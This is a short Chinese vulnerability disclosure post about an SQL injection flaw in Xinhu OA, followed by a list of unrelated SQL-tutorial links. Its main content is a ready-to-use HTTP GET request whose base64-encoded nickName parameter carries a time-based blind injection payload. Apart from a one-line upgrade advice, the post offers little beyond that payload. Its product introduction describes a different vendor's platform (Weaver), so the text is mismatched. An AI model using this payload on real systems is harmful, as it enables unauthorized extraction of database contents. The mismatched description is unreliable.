漏洞披露-信呼-OA

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
技术卷38 分钟前
详解力扣高频SQL50题之610. 判断三角形【简单】
sql·leetcode·oracle
技术卷3 小时前
详解力扣高频SQL50题之619. 只出现一次的最大数字【简单】
sql·leetcode·oracle
Goona_16 小时前
拒绝SQL恐惧:用Python+pyqt打造任意Excel数据库查询系统
数据库·python·sql·excel·pyqt
rufeii19 小时前
[极客大挑战 2019]FinalSQL--布尔盲注
sql
技术卷1 天前
详解力扣高频SQL50题之1084. 销售分析 III【简单】
sql·leetcode·oracle
Johny_Zhao1 天前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
NPE~1 天前
基于MySQL实现基础图数据库
数据库·sql·mysql·教程·图数据库·图结构
技术卷1 天前
详解力扣高频SQL50题之550. 游戏玩法分析 IV【中等】
sql·mysql·leetcode·oracle
样子20181 天前
Sql注入 之sqlmap使用教程
数据库·sql
技术卷1 天前
详解力扣高频 SQL 50 题之584. 寻找用户推荐人【入门】
sql·leetcode·oracle